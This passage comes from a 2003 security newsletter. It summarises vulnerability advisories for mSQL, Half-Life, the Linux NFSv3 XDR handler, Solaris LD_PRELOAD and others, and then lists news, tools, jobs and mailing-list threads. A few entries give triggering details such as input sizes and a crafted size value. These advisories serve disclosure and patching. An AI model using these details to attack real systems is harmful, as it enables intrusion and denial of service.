Mini SQL (mSQL) is a relational database management system.
mSQL has been reported prone to a remotely exploitable format string
vulnerability.
Reportedly a remote attacker may send malicious format specifiers to
trigger the issue. This issue is due to erroneous use of a formatting
function, which may allow format specifiers to be supplied by an external
source, in this case a remote user. By passing specially crafted format
specifiers through a session, may corrupt process memory and thereby have
the ability to execute arbitrary code with the privileges of the affected
daemon, which is typically root.
This vulnerability has been reported to affect mSQL version 1.3 and all
prior versions; other versions may also be affected.
19. XBlast HOME Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 8296
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8296
Summary:
XBlast is a multi-player arcade game available for Windows and various
Linux distributions.
A locally exploitable buffer overflow vulnerability has been reported in
XBlast 2.6.1.
XBlast does not perform adequate bounds checking on input supplied via the
HOME environment variable. Successful exploitation can lead to arbitrary
code execution. XBlast is typically installed setgid games on Linux
systems, making it possible to exploit this issue to gain these
privileges.
20. KDE Konqueror HTTP REFERER Authentication Credential Leak Vulnerability
BugTraq ID: 8297
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8297
Summary:
Konqueror is a freely available, open source web browser distributed and
maintained by the KDE project. It is available for the Unix and Linux
operating systems.
It has been reported that a problem in KDE Konqueror may result in the
leak of authentication credentials through the HTTP REFERER header field.
This could result in an attacker gaining unauthorized access to
authentication information.
When a user visits a site that keeps the authentication credentials in the
URL, the browser will pass the authentication credentials to the site at
the end of the URL through the referrer log. This could result in
unauthorized access to the user account of the referring page site.
21. Valve Software Half-Life Client Connection Routine Buffer Overflow Vulnerability
BugTraq ID: 8299
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8299
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life Client has been reported prone to a remotely exploitable buffer
overflow condition.
The issue presents itself in the client connection routine, used by the
client to negotiate a connection to the Half-Life game server. Due to a
lack of sufficient bounds checking performed on both the parameter and
value of data transmitted from the game server to the client, a malicious
server may execute arbitrary code on an affected client.
It has been reported that a parameter of 516 bytes and a value of 268,
will corrupt data adjacent to an insufficient buffer. This may allow a
remote attacker to corrupt a saved instruction pointer and thereby
influence program execution flow. Ultimately the attacker may trigger the
execution of supplied instructions in the context of the user running the
affected game client.
It should be noted that although this vulnerability has been reported to
affect Half-Life version 1.1.1.0, previous versions are likely affected.
22. Valve Software Half-Life Dedicated Server Malformed Parameter Loop Denial Of
Service Vulnerability
BugTraq ID: 8301
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8301
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life servers are prone to a denial of service that may be exploited
by a malicious client. By supplying malformed parameters in a client
packet during a request to join a multiplayer game, it may be possible to
cause a loop within the server program. This would result in a crash of
the vulnerable server.
This vulnerability affects the server bundled with Half-Life and the free
Dedicated Server for both Windows and Linux operating systems.
23. Valve Software Half-Life Dedicated Server Multiplayer Request Buffer Overflow
Vulnerability
BugTraq ID: 8300
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8300
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life servers are prone to a buffer overflow that may be exploited by
a malicious client. By supplying overly long parameters supplied in a
client packet during a request to join a multiplayer game, it may be
possible to corrupt adjacent locations of stack memory with
attacker-supplied data. This could allow for code execution in the
context of the vulnerable server. It should be noted that the type of
data sent may be restricted by the Half-Life protocol, which may make
exploitation more difficult, as certain characters will not be permitted
in the client request.
This vulnerability affects the server bundled with Half-Life and the free
Dedicated Server for both Windows and Linux operating systems.
24. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of Service
Vulnerability
BugTraq ID: 8298
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8298
Summary:
XDR (External Data Representation) is a protocol governing the platform
independent description and encoding of data, in this particular case it
is used in conjunction with the Linux implementation of NFSv3 (Network
File System), used to share system based resources across a network. NFS
uses XDR to describe the format of its data.
Linux Kernel 2.4 XDR handler routines for NFSv3 have been reported prone
to a remote denial of service vulnerability.
The issue presents itself in the decode_fh XDR handler routine contained
in the nfs3xdr.c kernel source file. The issue is due to a signed/unsigned
mismatch, when processing the size field of an XDR packet.
A malicious attacker may bypass the following signed sanity check
arithmetic (if (size > NFS3_FHSIZE) of the decode_fh XDR handler routine,
by crafting an XDR packet that contains a negative two's compliment
representation of -1, or 0xFFFFFFFF. This value will be passed to a
memcpy() function that uses the unsigned value of 0xFFFFFFFF or (4 GB), as
its size parameter, the massive memcpy operation will trigger a kernel
panic.
It has been reported that the target host may need an accessible exported
directory, if this vulnerability is to be successfully exploited. It
should be noted that other methods to trigger the vulnerability might also
be possible.
This vulnerability has been reported to affect the Linux 2.4 kernel tree.
25. NetScreen ScreenOS TCP Window Size Remote Denial Of Service Vulnerability
BugTraq ID: 8302
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8302
Summary:
NetScreen is a line of Internet security appliances integrating firewall,
VPN and traffic management features. ScreenOS is the software used to
manage and configure the firewall. NetScreen supports Microsoft Windows
95, 98, ME, NT and 2000 clients.
NetScreen ScreenOS has been reported prone to a vulnerability that may
allow a remote user to trigger a denial of service condition in an
affected appliance.
It has been reported that by modifying system configuration values that
control the TCP window size, an attacker may trigger a denial of service
in a remote appliance, by connecting to the target appliance.
It has been reported that the issue only affects NetScreen appliances that
are configured to use management services. For example HTTP, SSH or
Telnet.
This issue only affects some ScreenOS 4.0.1rx and 4.0.3rx releases.
NetScreen IDP, NetScreen Firewall/VPN products running ScreenOS 3.x and
earlier, 4.0.0, and 4.0.2 are not vulnerable. The vendor has supplied
upgrades for affected versions.
26. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
BugTraq ID: 8303
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8303
Summary:
mandb is a utility that is used to initialize or manually update the index
database caches that are usually maintained by the man utility.
mandb has been reported to be affected by multiple buffer overflow
vulnerabilities.
These issues present themselves in the ult_src(), add_to_dirlist(),
test_for_include() functions and in the PATH/MANPATH argument handler of
mandb.
The issues are due to insufficient bounds checking performed on
user-supplied data before it is copied into reserved buffers in memory. A
local attacker may supply excessive data in a manner sufficient to trigger
these issues and in doing so corrupt arbitrary memory. It has been
conjectured that an attacker may ultimately exploit this issue to execute
arbitrary instructions, with elevated privileges.
Code execution would occur in the context of the mandb utility, typically
user 'man'.
This BID will be split up into unique BIDs as these issues are analyzed in
further detail.
27. Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow Vulnerability
BugTraq ID: 8305
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8305
Summary:
Sun Solaris runtime linker (ld) is a utility that is harnessed to link
shared objects to executables at runtime. The environment variable
LD_PRELOAD is used to define a library that will be prioritized above
others when seeking shared libraries.
The Sun Solaris ld runtime linker has been reported prone to a buffer
overflow vulnerability. It has been conjectured that the issue presents
itself, due to insufficient bounds checking performed in the routines used
to process the value of LD_PRELOAD. The effected routine is thought to be
called in the case that an unprivleged user specifies an LD_PRELOAD value
when invoking a setuid binary.
It has been reported that a local attacker may craft an LD_PRELOAD value,
consisting of 1200 bytes of data, appended and pre-pended with a forward
slash. The attacker may then invoke a setuid binary that is dynamically
linked, to trigger the condition in the ld linker. Excessive data copied
from the LD_PRELOAD value, may corrupt internal memory and ultimately
result in the execution of arbitrary code with elevated privileges.
It should be noted that this problem affects systems with the following
attributes:
Sparc Solaris 2.6 with patch 107733-10, and without patch 107733-11.
Sparc Solaris 7 with patches 106950-14 through 106950-22, and without patch 106950-
23.
Sparc Solaris 8 with patches 109147-07 through 109147-24, and without patch 109147-
25.
Sparc Solaris 9 without patch 112963-09.
Intel Solaris 2.6 with patch 107734-10, and without patch 107734-11.
Intel Solaris 7 with patches 106951-14 through 106951-22, and without patch 106951-
23.
Intel Solaris 8 with patches 109148-07 through 109148-24, and without patch 109148-
25.
Intel Solaris 9 without patch 113986-05.
28. SGI IRIX NSD AUTH_UNIX GID List Privilege Escalation Vulnerability
BugTraq ID: 8304
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8304
Summary:
The IRIX unified nsd (Name Service Daemon) provides a generic interface to
a number of network lookup services including DNS, NIS and LDAP.
SGI has reported a vulnerability in IRIX that may permit attackers to gain
remote root privileges via the nsd server and modules. The problem is a
heap overflow in the RPC AUTH_UNIX functionality of the nsd service.
By submitting a malicious string to the service which typically handles
RPC AUTH_UNIX requests on UDP ports above 1024, it is possible to corrupt
heap memory to execute attacker-supplied instructions. This problem would
allow an attacker to gain access to the vulnerable system with the
privileges of the nsd service.
29. Symantec Quarantine Server Disconnect Denial Of Service Vulnerability
BugTraq ID: 8306
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8306
Summary:
Symantec Quarantine Server is a component of Symantec and Norton AntiVirus
Corporate Edition. The server can be be configured to listen on a
user-specified port.
Symantec Quarantine Server (qserver.exe) is prone to a denial of service
vulnerability. This can occur when a user disconnects from the service
before sending any data. This can cause CPU usage for the service to
spike to 100%, potentially denying availability of other resources.
The Quarantine Server must be rebooted for normal functionality to resume.
30. XConq Multiple Environment Variable Buffer Overflow Vulnerabilities
BugTraq ID: 8307
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8307
Summary:
xcong is a multiplayer game that is available for a number of Unix/Linux
variants.
Multiple locally exploitable buffer overflows have been reported in xconq.
This is due to insufficient bounds checking of data supplied via the USER
and DISPLAY environment variables. This may permit a local attacker to
corrupt adjacent regions of stack memory with specific values, allowing
execution of arbitrary code in the context of the program, which is
typically installed setgid 'games'.
This issue appears similar to BID 1495. Further analysis of these issues
may determine that the issues are identical, in which case this BID will
be retired and the earlier BID will be updated.
III. SECURITYFOCUS NEWS AND COMMENTARY
------------------------------------------
1. Fed: Cyberterror fears missed real threat
By Kevin Poulsen
A top U.S. cyber security official says the government was looking for
imagined terrorist hackers, while real terrorists were plotting 9-11.
http://www.securityfocus.com/news/6589
2. Panel Probes the Half-life of Bugs
By Kevin Poulsen
Researchers find that software vulnerabilities have a predictable decay
rate, and the Microsoft RPC hole is currently the most prevalent on the
net.
http://www.securityfocus.com/news/6568
3. UK e-voting pilots deeply flawed
By John Leyden, The Register
A leading British academic has warned of the shortcomings of electronic
voting schemes tried at this year's local elections.
http://www.securityfocus.com/news/6580
4. Yaha usurps Klez
By John Leyden, The Register
Yaha-E displaced Klez as the most common viral menace on the Internet over
the last month, according to Messagelabs.
http://www.securityfocus.com/news/6579
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. PeerProtect v0.2
by Poulet Fabrice
Relevant URL:
http://www.atout.be/
Platforms: Linux, POSIX
Summary:
PeerProtect is an addon for Jay's firewall that generates a file which
contains all IP addresses from the RIAA and MPAA, etc. and will protect
peer-to-peer programs from them.
2. DSPAM v2.6.3
by Jonathan A. Zdziarski
Relevant URL:
http://www.networkdweebs.com/software/dspam/
Platforms: UNIX
Summary:
DSPAM is a server-side anti-spam agent for UNIX email servers. It
masquerades as the email server's local delivery agent and filters/learns
SPAM using a Bayesian statistical approach which provides an
administratively maintenance-free, self-learning Anti-Spam service. Each
email is broken down into its most interesting tokens, each assigned a
spam probability. All probabilities are then combined to produce a
statistical probability of spam. This approach, applied to a mature corpus
of email, has the potential to yield a 99.5% success rate with only 0.03%
chance of false positives.
3. pkdump v0.96.2
by dsmoker
Relevant URL:
http://pkdump.sourceforge.net/pkdumpage.html
Platforms: Linux, POSIX
Summary:
pkdump detects TCP and UDP port scans and connection attempt from foreign
hosts over the Internet.
4. Dante v1.1.14
by Inferno Nettverk A/S, info (at) inet (dot) no [email concealed]
Relevant URL:
http://www.inet.no/dante/
Platforms: Digital UNIX/Alpha, IRIX, Linux, OpenBSD, Solaris, SunOS
Summary:
Dante is a free implementation of the proxy protocols socks version 4,
socks version 5 (rfc1928), and msproxy. It can be used as a firewall
between networks. The package consists of two parts, a socks server and a
proxy client which supports socks, msproxy, and HTTP proxies. Commercial
support is available.
5. System Rescue CD v0.2.0
by François Dupoux
Relevant URL:
http://systemrescuecd.sourceforge.net/
Platforms: Linux
Summary:
SystemRescueCd is a Linux system available from a bootable CDROM that
provides an easy way to perform administrative tasks on your computer,
such as creating and editing the partitions of the hard disk or backing up
data. It contains a lot of system utilities (such as parted, qtparted,
partimage, and fstools) and basic utilities (such as editors, midnight
commander, and network tools).
6. FSlint v2.0.2
by pixelbeat
Relevant URL:
http://www.iol.ie/~padraiga/fslint/
Platforms: POSIX, UNIX
Summary:
FSlint is a toolkit to find various forms of lint on a filesystem. At the
moment it reports duplicate files, bad symbolic links, troublesome file
names, empty directories, non stripped executables, temporary files,
duplicate/conflicting (binary) names, and unused ext2 directory blocks.
V. SECURITY JOBS SUMMARY
------------------------
1. Systems Security Engineer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331403
2. Looking for a Software Developer or Researcher Position (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331400
3. Technical Operations Manager vacancy (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331405
4. Two security positions, one in PA and one in DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331392
5. Network Security Engineer relocating to PA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331402
6. Security Engineer position - Montgomery, AL (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331409
7. Question about opportunities for Americans outside the US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331395
8. Installation & Support Technician (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331397
9. Ethical Hacker Needed -- Chicago (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331393
10. Security Software Sales opportunity- Federal (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331398
11. Security Software Sales opportunities- Midwest, Southeast/west (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331394
12. Information Security Architect - Franklin Lakes, NJ, USA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331396
13. Cisco is looking for a Sr. Microsoft security expert (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331406
14. Sr. IA Engineer to work on program in Wash., DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331401
15. IA Program Manger (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331408
16. Full time IT Auditor position in Pittsburgh PA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331404
17. Seeking Information Security Position in the Washington, DC Metro Area (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331407
18. Seattle - Security Sales (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331399
19. Google: Network Security Engineer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330989
20. Fulltime Test positions -Northern Va (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330992
21. Symantec's MSS practice looking for security device expert - Alexandria, VA
(Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330988
22. Senior Security Professional seeking post (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330991
23. Senior Security Analyst Opportunity - Alphatech Corporation (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330983
24. IMMEDIATE OPENING - Vulnerability Assessment, Reston, VA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330990
25. IMMEDIATE OPENING - Sr. IDS Manager, Bethesda, MD (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330984
26. Senior IT Auditor (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330982
27. System Security Analyst (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330997
28. IT Security Auditor (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330981
29. Top Secret Cleared Security Professionals Wanted (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330985
30. Open Positions at LURHQ Corporation (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330980
31. Seeking Information Security Position in the SF Bay Area (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330978
32. Network Security Engineer - Washington, DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330977
33. Axexandria, VA - Sr Mgmt Systems Programmer wanted (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330976
34. Security Software Developer available (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330975
VI. INCIDENTS LIST SUMMARY
-------------------------
1. Command Line RPC vulnerability scanner? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331427
2. Scan of TCP 552-554 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331331
3. RPC DCOM exploit (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331327
4. Scans for 17300/tcp starting again (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331293
5. Exploit for Windows RPC may be in the wild! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331226
6. new worm? or DDoS attack in progress (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331221
7. Importance of outbound traffic filtering (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331222
8. floods through our proxy (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331008
9. Anyone know this tool? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330901
10. email worm? Newsletter, aaa.exe, caraoke ksp.exe (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330715
11. www.google.com reference in directory-traversal attack (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330707
12. New or old PHP worm? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330693
13. Is this enough to identify this by? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330692
14. "access_log?hello" ? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330760
15. First time security issue. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330688
16. [security-elvandar] "access_log?hello" ? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330691
17. Heavy port 1214 traffic revisited (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330610
18. First Time Security Incident (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330612
19. email worm? Newsletter, aaa.exe, caraoke ksp.exe (fwd) (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330607
20. New worm in Japan? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330606
21. Port 0 packets (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330609
VII. VULN-DEV RESEARCH LIST SUMMARY
----------------------------------
1. Analyze binary for holes (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331364
2. Some help With BOF Exploits Writing. - EAX ?! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331362
3. Password Cracking Challenge... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331319
4. perl/php connect-back backdoor? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331107
5. VL: Remote Linux Kernel < 2.4.21 DoS in XDR routine. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331106
6. is it even possible for a worm with dcom vuln? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331103
7. Some help With BOF Exploits Writing. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331099
8. proces on win2K (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330711
9. Thanks much! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330433
10. Unbreakable Lotus Notes (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330434
VIII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. DCOM RPC exploit as a virus/trojan? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331422
2. change NT passwords Kerberos (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331421
3. How to silently deploy DirectX9b? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331419
4. Windows XP "write attributes" permission for Users (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331275
5. IAS as a RADIUS server (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331114
6. HTASploit (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331021
7. ISA Server and Win2k3 standard OS (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330884
8. SecurityFocus Microsoft Newsletter #147 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330740
9. monitor folders (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330728
10. Tracking down a user in a large AD network (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330724
IX. SUN FOCUS LIST SUMMARY
----------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
XI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: SPI Dynamics
NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands
into a Web form input box giving hackers complete access
to all your backend systems! Firewalls and IDS will not
stop such attacks because LDAP Injections are seen as valid
data.
Download this *FREE* white paper from SPI Dynamics for a
complete guide to protection!
http://www.securityfocus.com/SPIDynamics-sf-news5
------------------------------------------------------------------------
--
[ reply ]